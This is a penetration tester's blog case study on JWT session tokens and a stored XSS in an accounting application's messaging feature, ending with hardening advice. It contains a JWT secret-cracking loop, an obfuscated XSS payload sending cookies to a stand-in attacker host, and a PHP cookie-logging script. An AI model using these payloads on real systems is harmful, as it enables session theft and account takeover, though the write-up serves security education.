eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg

During a web application penetration test, I often sign out and sign in multiple times to see whether a newly generated session token, provided by the server, differs much from the previous one. In this case, it was apparent the token was in the JSON Web Token format.

In short, a JSON Web Token, aka JWT, is a combination of user data and a hash signature. The signature prevents anyone who doesn't know the secret key used in the signing process from crafting their own tokens. The token is divided into three sections, each encoded with base64.

Dissecting this application's token we get:

JWT format: <signing_algo_info>.<user_data>.<signature>
JWT: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg  

atob('eyJhbGciOiJIUzI1NiJ9') => '{"alg":"HS256"}'
atob('eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30') => '{"tokenType":"AUTHORIZE","exp":1489663403,"id":77}'
atob('5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg') => <signature_hash_binary_data_HMAC_SHA256_user_data>

The server re-calculates the signature hash of user_data with the secret key known only to the server. If the re-calculated hash differs from the one supplied with the token, the token will not be accepted.
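
To make the verification step concrete, here is a minimal HS256 verification sketch in Python (my illustration of the mechanism, not the application's server code):

import base64
import hashlib
import hmac

def b64url_decode(s):
    # JWTs strip base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def verify_hs256(token, secret):
    header_b64, payload_b64, sig_b64 = token.split(".")
    signed_part = (header_b64 + "." + payload_b64).encode()
    expected = hmac.new(secret.encode(), signed_part, hashlib.sha256).digest()
    # Constant-time comparison to avoid timing side channels.
    return hmac.compare_digest(expected, b64url_decode(sig_b64))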

We can see that the token contains a timestamp of when it is supposed to expire (in this case, tokens were valid for one day) and the ID of the user who should be authorized. It is evident that if we were able to change the id value inside the token, it would allow us to be authorized as any registered user of the application. The issue is, we would have to re-calculate the signature hash using the secret key we don't know.

It is possible to brute-force the secret key using an offline dictionary attack and a powerful PC, but if the secret key is longer than 12 characters and also uses special characters, this will be a waste of time and, more importantly, a waste of CPU or GPU cycles.
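
An offline dictionary attack is just the verification routine from the sketch above run in a loop over a wordlist; a minimal sketch (the wordlist path is hypothetical):

def crack_hs256(token, wordlist_path):
    # Reuses verify_hs256 from the previous sketch: the candidate secret
    # that reproduces the token's signature is the key.
    with open(wordlist_path, "r", errors="ignore") as f:
        for line in f:
            secret = line.rstrip("\n")
            if verify_hs256(token, secret):
                return secret
    return None

# e.g. crack_hs256(jwt_string, "wordlist.txt")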

There have already been many articles written on why using JWTs for sessions is bad, so I'll try to keep my list short and stick to the two major flaws:

  1. Possibility of cracking the secret key. If the attacker has the resources, time and enough motivation, the secret key can be cracked.
  2. No way to invalidate the tokens. Every application that allows users to manage their accounts should invalidate and re-create the session token every time the user signs in, signs out or resets his/her password. This makes sure that any attacker who managed to intercept the user's session token will not be able to use it anymore; they immediately lose access to the overtaken account. This cannot be done with a JWT, as the server will reject the session token only after its "exp":1489663403 timestamp is hit.

Let's set aside the fact that the application is using JWTs as session tokens and focus on the implications of allowing the session token to be accessible from javascript.

A sample request to the REST backend that includes the session token looks as follows:

GET /messages/page/1?cacheTime=1489429271483&messagePageType=LATEST&pageSize=10&read=false HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

As we can see, the session token is sent in a custom HTTP header, X-AUTH-TOKEN. Sending session tokens in custom HTTP headers protects applications from Cross-site Request Forgery (CSRF) attacks. Unfortunately, the fact that the globals cookie storing the token must be available from javascript, in order to be included with a request, makes the application exceptionally vulnerable to token theft. All the attacker needs is one XSS vulnerability in the application to capture the token cookie with injected javascript code.

With that in mind, I proceeded to look for vulnerabilities that would allow me to inject javascript code.

One XSS to Rule Them All

I found a messaging feature in the application that immediately caught my attention. Basically, it allowed any user to send any message to the application's administrators and initiate a conversation. If vulnerable, it would make the perfect channel to deliver a stored XSS payload straight to the site administrators.

I put a blank message with one carriage return character, clicked Send and looked at the request:

PUT /messages HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 1242
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

{"id":3596,"content":"<div><br></div>","creationDate":"2017-03-13T19:42:36+0000","sender":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"recipient":{"id":1,"email":"[email protected]","status":"ACTIVE","role":"OFFICE_ADMIN","firstName":"Admin","lastName":"Office","client":null,"creationDate":"2015-12-21T09:09:05+0000"},"modificationDate":null,"read":false,"attribute":null,"date":"13.03.2017 20:42"}

When I saw "content":"<div><br></div>" in the JSON request body, I knew I was right at home. The application swallowed and spat the contents of the message back out without any filtering at all. All supplied HTML tags were preserved.

I confirmed the presence of the XSS vulnerability by sending "content":"<script>alert(1)</script>" as a replacement for my message content, using the Edit feature and intercepting the request in Burp Proxy. After reloading, the page greeted me valiantly with a javascript alert box.

Seeing that the request contained recipient information as well, it would have been worth testing whether messages could be sent to arbitrary users of the application by tampering with the recipient data; that would let an attacker launch phishing attacks against other users. At this point I didn't bother, as I already had everything needed to set up an attack that would hopefully grant me administrator privileges.

The Attack

In order to intercept the administrator's cookies, I decided to make my script create a new Image and append it to the document's body. The user's cookies would be sent to an attacker-controlled server via a GET parameter embedded in the URL of a fake image on the attacker's web server.

Injected HTML code would look like this:

<img src="http://ATTACKER.IP/image.php?c=<stolen_cookies>" />

The moment the browser renders this image, all of the visitor's cookies (for the current domain) will be sent to the attacker's server.

In order to dynamically inject the image into the document's body, I needed a javascript one-liner to act as the XSS payload. Here it is:

var img = new Image(0,0); img.src='http://ATTACKER.IP/image.php?c=' + document.cookie; document.body.appendChild(img);

To make it less obvious and to obfuscate the payload a bit, I converted it to use base64 encoding:

eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));

My payload was ready, but I also needed a server backend at http://ATTACKER.IP/image.php that would wait for stolen cookies and log them for later retrieval. Here is the simple PHP script I used to do the job. Just remember to create the secretcookielog9977.txt file in advance and give it R/W permissions:

<?php

if (isset($_GET['c'])) $cookie = $_GET['c']; else exit;

$log = 'secretcookielog9977.txt';

$d = date('Y-m-d H:i:s');
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip_addr = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];

$f = fopen($log, 'a+');
fputs($f, "Date: $d | IP: $ip_addr | UA: $ua | Referer: $referer\r\nCookies: $cookie\r\n\r\n");
fclose($f);

?>

With all that prepared, I returned to the application and edited my message for the last time. I intercepted the edit HTTP request and replaced the content data with:

"content":"<script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));</script>"

I reloaded the page and checked secretcookielog9977.txt on my web server to confirm that I had managed to steal my own cookies. All worked perfectly.

Now all I had to do was wait for the site administrator to sign in and read my malicious message. Shortly after...

** JACKPOT **

I had the administrator's session token, valid for one full day. Due to the token being a JSON Web Token, there was no way for the administrator to invalidate it, even if it was found to be compromised.

With the administrator's token captured, a real attacker could have done significant damage. For me, it was enough to demonstrate the risk and report my findings.

Game over

As demonstrated, the application had an evident stored XSS vulnerability that allowed an attacker to steal the administrator's cookies, including the session token. The XSS would have had much less impact if the cookie had been stored with the http-only flag, making it inaccessible from javascript. However, the session token was meant to be sent with every request to the REST API in a custom X-AUTH-TOKEN header, so making it accessible from javascript was mandatory.

Here are my two cents on how the security of the pentested application could be improved:

1. Never allow cookies containing session tokens to be accessible from javascript.

In my opinion, cookies that include the session token or other critical data should never be set without the http-only flag. The session token should be stored in a separate cookie flagged http-only, and the REST API backend should reply with the following HTTP headers:

Access-Control-Allow-Origin: https://app.accounting.com
Access-Control-Allow-Credentials: true

Then, if the request to the REST API made from javascript is sent with the property withCredentials: true, the cookie with the session token will be automatically attached and securely sent to the backend server in a Cookie: header. Furthermore, the cookie will only be attached if the request is made from the https://app.accounting.com origin, protecting users from possible CSRF attacks. There is no need to use custom headers for transporting session tokens, and it is always better to use standard cookies, which receive better protection from modern web browsers.

2. Authorize users with randomly generated session tokens.

Using JSON Web Tokens as session tokens is rather secure if you use a strong secret key, but keep in mind that if your signing key ever gets leaked or stolen and attackers get hold of it, they will be able to forge their own session tokens, allowing them to impersonate every registered user of the application.

It is imperative for every web application to use randomly generated session tokens that can be invalidated at any time. Sessions should be invalidated every time the user signs in, signs out or resets their password. Such session handling will also protect users from session fixation attacks.
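
A minimal sketch of that approach (the names and the in-memory store are illustrative; a real application would persist sessions in a database or cache):

import secrets

SESSIONS = {}  # token -> user id; in-memory for illustration only

def create_session(user_id):
    token = secrets.token_urlsafe(32)  # 256 bits of randomness
    SESSIONS[token] = user_id
    return token

def invalidate_user_sessions(user_id):
    # Call on sign-in, sign-out and password reset.
    for token in [t for t, uid in SESSIONS.items() if uid == user_id]:
        del SESSIONS[token]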

In the pentested application, an additional random session token could be embedded inside the JWT itself, in the data section, like so:

{"tokenType":"AUTHORIZE","exp":1489663403,"id":77,"token":"79c7d0c479011ca769be91c049dedae8b6e0cdec6c3ec7f652804fe446094b26"}

It is important to note here that the application also used a JWT as the verification token inside the password reset link. Password resetting functionality should always be handled using one-time tokens. Once the password is reset, the reset token should be invalidated to prevent anyone from using it again. Using a JWT makes it possible to re-use the token for as long as the expiration timestamp allows.

3. Use Secure flag for all cookies.

If the application is served only via HTTPS (and it should be), setting the secure flag on cookies will allow them to be sent only over a secure HTTPS connection. That way, the application's session tokens will never be sent in plain text, making them protected against man-in-the-middle attacks.

Conclusion

I hope you found this little case study useful. Although I'm aware I haven't exhausted the subject of improper session handling or launching XSS attacks, I wanted to present a sample real-life scenario of a web application penetration test. If you are a web developer, you may from now on look differently at the implementation of session tokens, and maybe you will put more effort into filtering those nasty HTML tags in the output of user-supplied data.

If you are looking for a web application penetration tester or reverse engineer, I will be more than happy to hear about your project and how I can help you.

I am always available on Twitter @mrgretzky or directly via email [email protected].

Have a nice day and see you in my next post!
